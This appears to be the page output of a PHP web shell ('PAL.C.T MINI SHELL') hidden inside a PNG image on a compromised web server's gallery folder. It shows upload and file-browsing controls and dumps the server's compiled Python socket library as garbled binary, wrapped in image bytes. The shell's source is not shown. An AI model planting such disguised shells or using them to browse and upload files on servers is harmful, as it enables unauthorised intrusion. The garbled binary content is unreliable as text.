php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/img_galeri/2r1asasas/root/usr/lib/python2.6/
upload
files >> /var/www/html/img_galeri/2r1asasas/root/usr/lib/python2.6/socket.pyc

Lc!@sSdZddkZddkTyddkZWnej
onsXeedZddklZddklZl	Z	l
Z
lZlZl
Z
lZlZlZlZlZlZddkZddkZddkZyddklZWn#ej
oddklZnXyddkZWnej
o
eZnXeedd	Zeed
dZdd
gZeieiee Z!ei"i#i$dohZ%de%d<de%d<de%d<de%d<de%d<de%d<de%d<de%d<de%d <d!e%d"<d#e%d$<d%e%d&<d'e%d(<d)e%d*<d+e%d,<ei&d-nd.d/Z'd0d1d2d3d4d5d6d7d8d9d:d;d<d=fZ(ei)d>joe(d?fZ(nei"d@joe(dAfZ(ndBdCdDdEdFdGfZ*dHe+fdIYZ,dJe+fdKYZ-e-Z Z.dLZ/dMe+fdNYZ0e+Z1e1dOZ2dS(PsThis module provides socket operations and some related functions.
On Unix, it supports IP (Internet Protocol) and Unix domain sockets.
On other systems, it only supports IP. Functions specific for a
socket are available as methods of the socket object.

Functions:

socket() -- create a new socket object
socketpair() -- create a pair of new socket objects [*]
fromfd() -- create a socket object from an open file descriptor [*]
gethostname() -- return the current hostname
gethostbyname() -- map a hostname to its IP number
gethostbyaddr() -- map an IP number or hostname to DNS info
getservbyname() -- map a service name and a protocol name to a port number
getprotobyname() -- map a protocol name (e.g. 'tcp') to a number
ntohs(), ntohl() -- convert 16, 32 bit int from network to host byte order
htons(), htonl() -- convert 16, 32 bit int from host to network byte order
inet_aton() -- convert IP addr string (123.45.67.89) to 32-bit packed format
inet_ntoa() -- convert 32-bit packed format IP to string (123.45.67.89)
ssl() -- secure socket layer support (only available if configured)
socket.getdefaulttimeout() -- get the default timeout value
socket.setdefaulttimeout() -- set the default timeout value
create_connection() -- connects to an address, with an optional timeout

 [*] not available on all platforms!

Special objects:

SocketType -- type object for socket objects
error -- exception raised for I/O errors
has_ipv6 -- boolean value indicating if IPv6 is supported

Integer constants:

AF_INET, AF_UNIX -- socket domains (first argument to socket() call)
SOCK_STREAM, SOCK_DGRAM, SOCK_RAW -- socket types (second argument)

Many other constants may be defined; these may be used in calls to
the setsockopt() and getsockopt() methods.
iN(t*cCs5ddk}tidtdd|i|||S(Nis;socket.ssl() is deprecated.  Use ssl.wrap_socket() instead.t
stackleveli(tssltwarningstwarntDeprecationWarningtsslwrap_simple(tsocktkeyfiletcertfilet_realssl((s/usr/lib/python2.6/socket.pyR7s	
(tSSLError(tRAND_addtRAND_egdtRAND_statustSSL_ERROR_ZERO_RETURNtSSL_ERROR_WANT_READtSSL_ERROR_WANT_WRITEtSSL_ERROR_WANT_X509_LOOKUPtSSL_ERROR_SYSCALLt
SSL_ERROR_SSLtSSL_ERROR_WANT_CONNECTt
SSL_ERROR_EOFtSSL_ERROR_INVALID_ERROR_CODE(tStringIOtEBADFi	tEINTRitgetfqdntcreate_connectiontwinsThe operation was interrupted.i'sA bad file handle was passed.i'sPermission denied.i's!A fault occurred on the network??i's#An invalid operation was attempted.i&'s The socket operation would blocki3's,A blocking operation is already in progress.i4'sThe network address is in use.i@'sThe connection has been reset.iF'sThe network has been shut down.iJ'sThe operation timed out.iL'sConnection refused.iM'sThe name is too long.iO'sThe host is down.iP'sThe host is unreachable.iQ'terrorTabtcCs|i}|p
|djo
t}nyt|\}}}Wntj
on;X|id|x&|D]}d|joPqtqtW|}|S(sGet fully qualified domain name from name.

    An empty argument is interpreted as meaning the local host.

    First the hostname returned by gethostbyaddr() is checked, then
    possibly existing aliases. In case no FQDN is available, hostname
    from gethostname() is returned.
    s0.0.0.0it.(tstriptgethostnamet
gethostbyaddrterrortinsert(tnamethostnametaliasestipaddrs((s/usr/lib/python2.6/socket.pyRys	

	tbindtconnectt
connect_extfilenotlistentgetpeernametgetsocknamet
getsockoptt
setsockopttsendalltsetblockingt
settimeoutt
gettimeouttshutdowntnttioctltriscost
sleeptaskwtrecvtrecvfromt	recv_intot
recvfrom_intotsendtsendtot
_closedsocketcBs7eZgZdZeZZZZZZ	eZ
RS(cGsttddS(NsBad file descriptor(R$R(targs((s/usr/lib/python2.6/socket.pyt_dummys(t__name__t
__module__t	__slots__RDR@R<R>RAR=R?t__getattr__(((s/usr/lib/python2.6/socket.pyRBs	t
_socketobjectcBseZeiZddgeeZeedddZ
dZeiie_dZeiie_dZ
ddd	Zed
ddZed
ddZedddZdZx&eD]ZeeeeefdUqW[[RS(t_sockt__weakref__icCsZ|djot|||}n||_x'tD]}t||t||q3WdS(N(tNonet_realsocketRJt_delegate_methodstsetattrtgetattr(tselftfamilyttypetprotoRJtmethod((s/usr/lib/python2.6/socket.pyt__init__s
	cCs=t|_|ii}xtD]}t|||qWdS(N(RBRJRDRNRO(RQtdummyRU((s/usr/lib/python2.6/socket.pytcloses
cCs(|ii\}}td||fS(NRJ(RJtacceptRI(RQRtaddr((s/usr/lib/python2.6/socket.pyRYscCstd|iS(sadup() -> socket object

        Return a new socket object connected to the same system resource.RJ(RIRJ(RQ((s/usr/lib/python2.6/socket.pytdupstricCst|i||S(smakefile([mode[, bufsize]]) -> file object

        Return a regular file object corresponding to the socket.  The mode
        and bufsize arguments are as for the built-in open() function.(t_fileobjectRJ(RQtmodetbufsize((s/usr/lib/python2.6/socket.pytmakefilescCs
|iiS((RJRR(RQ((s/usr/lib/python2.6/socket.pyt<lambda>stdocsthe socket familycCs
|iiS((RJRS(RQ((s/usr/lib/python2.6/socket.pyRassthe socket typecCs
|iiS((RJRT(RQ((s/usr/lib/python2.6/socket.pyRassthe socket protocolsVdef %s(self, *args): return self._sock.%s(*args)

%s.__doc__ = _realsocket.%s.__doc__
N(RERFRMt__doc__tlistRNRGtAF_INETtSOCK_STREAMRLRVRXRYR[R`tpropertyRRRSRTt_st_socketmethodst_m(((s/usr/lib/python2.6/socket.pyRIs"				cCs7t|idjo|idtjodSndS(Nii(tlenRCR(texc((s/usr/lib/python2.6/socket.pyt_exception_was_EINTRs	R]c
BseZdZdZdZddddddd	d
ddg
Zd
dedZdZe	eddZ
dZdZdZ
dZdZdZdZddZddZddZdZdZRS( s-Faux file object attached to a socket object.i s<socket>R^R_t	softspaceRJt	_rbufsizet	_wbufsizet_rbuft_wbuft	_wbuf_lent_closetrbicCs||_||_|djo
|i}n||_t|_|djo
d|_n'|djo|i|_n
||_||_t|_	g|_
d|_||_dS(Nii(
RJR^tdefault_bufsizeR_tFalseRnRoRpRRqRrRsRt(RQRR^R_RX((s/usr/lib/python2.6/socket.pyRVs 		

		


				cCs
|idjS(N(RJRL(RQ((s/usr/lib/python2.6/socket.pyt
_getclosed
sRbsTrue if the file is closedcCsHz|io|inWd|io|iind|_XdS(N(RJtflushRtRXRL(RQ((s/usr/lib/python2.6/socket.pyRXs

cCsy|iWnnXdS(N(RX(RQ((s/usr/lib/python2.6/socket.pyt__del__scCs|iodi|i}g|_d|_t|i|i}t|}d}z~xw||joitii	i
zAtioti
ddtn|iit|||WdQX||7}q[WWd||jo0||}~|ii|t||_nXndS(NRitignores.*buffer(RrtjoinRstmaxRoRvRkRtcatch_warningst__exit__t	__enter__tsystpy3kwarningtfilterwarningsRRJR3tbuffertappend(RQtdatatbuffer_sizet	data_sizetwrite_offsett	remainder((s/usr/lib/python2.6/socket.pyRy!s*
		

"

cCs
|iiS(N(RJR-(RQ((s/usr/lib/python2.6/socket.pyR-8scCst|}|pdS|ii||it|7_|idjp0|idjo
d|jp|i|ijo|indS(Niis
(tstrRrRRsRkRpRy(RQR((s/usr/lib/python2.6/socket.pytwrite;scCs{tdtt|}|ittt|7_|ii||i	djp|i|i	jo|i
ndS(Ni(tfilterRLtmapRRstsumRkRrtextendRpRy(RQRdtlines((s/usr/lib/python2.6/socket.pyt
writelinesFscCs|iS(N(Rs(RQ((s/usr/lib/python2.6/socket.pyt
_get_wbuf_lenPsc
Cs"t|i|i}|i}|idd|djot|_xjtoby|ii|}Wn,t	j
o }t
|oqJnnX|pPn|i|qJW|iS|i
}||joC|id|i|}t|_|ii|i|St|_xto||}y|ii|}Wn,t	j
o }t
|oq*nnX|pPnt|}	|	|jo
|o|S|	|jo|i|~Pn|	|jptd||	f|i|||	7}~q*W|iSdS(Niisrecv(%d) returned %d bytes(R}RoRvRqtseekRtTrueRJR<R$RmRtgetvaluettelltreadRktAssertionError(
RQtsizetrbufsizetbufRtetbuf_lentrvtlefttn((s/usr/lib/python2.6/socket.pyRSs`	







!

c
	Cs5|i}|idd|idjom|id|i|}|idpt||jo't|_|ii|i|S~n|djo|i	djo|id|ig}t|_d}|ii}xzt
ory>x7|djo)|d}|pPn|i|qWWn,tj
o }t|oqnnXPqWdi|S|iddt|_xt
oy|ii|i	}Wn,tj
o }t|oqnnX|pPn|id}|djo7|d7}|i|| |ii||~Pn|i|qW|iS|idd|i}	|	|joC|id|i|}
t|_|ii|i|
St|_xGt
o?y|ii|i	}Wn,tj
o }t|oqnnX|pPn||	}|idd|}|djoG|d7}|ii|||	o|i|| Pq|| Snt|}||jo
|	o|S||jo*|i|| |ii||Pn|i||	|7}	qW|iSdS(Niis
iR(RqRRtreadlinetendswithRkRRRRoRLRJR<RRR$RmR|tfindR(
RQRRtblinetbuffersRR<RtnlRRRR((s/usr/lib/python2.6/socket.pyRs	
#














icCsmd}g}xZtoR|i}|pPn|i||t|7}|o||joPqqW|S(Ni(RRRRk(RQtsizehintttotalRdtline((s/usr/lib/python2.6/socket.pyt	readliness

cCs|S(N((RQ((s/usr/lib/python2.6/socket.pyt__iter__scCs!|i}|p
tn|S(N(Rt
StopIteration(RQR((s/usr/lib/python2.6/socket.pytnexts
(RERFRcRvR&RGRwRVRxRgtclosedRXRzRyR-RRRRRRRR(((s/usr/lib/python2.6/socket.pyR]s*										
	Fi	cCsd}|\}}xt||dtD]}|\}}}}	}
d}yEt|||}|tj	o|i|n|i|
|SWq(tj
o$}|dj	o|iqq(Xq(Wt|dS(sConnect to *address* and return the socket object.

    Convenience function.  Connect to *address* (a 2-tuple ``(host,
    port)``) and return the socket object.  Passing the optional
    *timeout* parameter will set the timeout on the socket instance
    before attempting to connect.  If no *timeout* is supplied, the
    global default timeout setting returned by :func:`getdefaulttimeout`
    is used.
    s!getaddrinfo returns an empty listiN(	tgetaddrinfoRfRLtsockett_GLOBAL_DEFAULT_TIMEOUTR5R+R$RX(taddressttimeouttmsgthosttporttrestaftsocktypeRTt	canonnametsaR((s/usr/lib/python2.6/socket.pyRs 


(3Rct_sockett_ssltImportErrorRLRRtsslerrorRR
RRRRRRRRRRtosRRt	cStringIORterrnoRPRRt__all__Rt_get_exports_listRRMtplatformtlowert
startswithRRRRiR&RNtobjectRBRIt
SocketTypeRmR]RR(((s/usr/lib/python2.6/socket.pyt<module>,sx
	R$














0
	3	
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`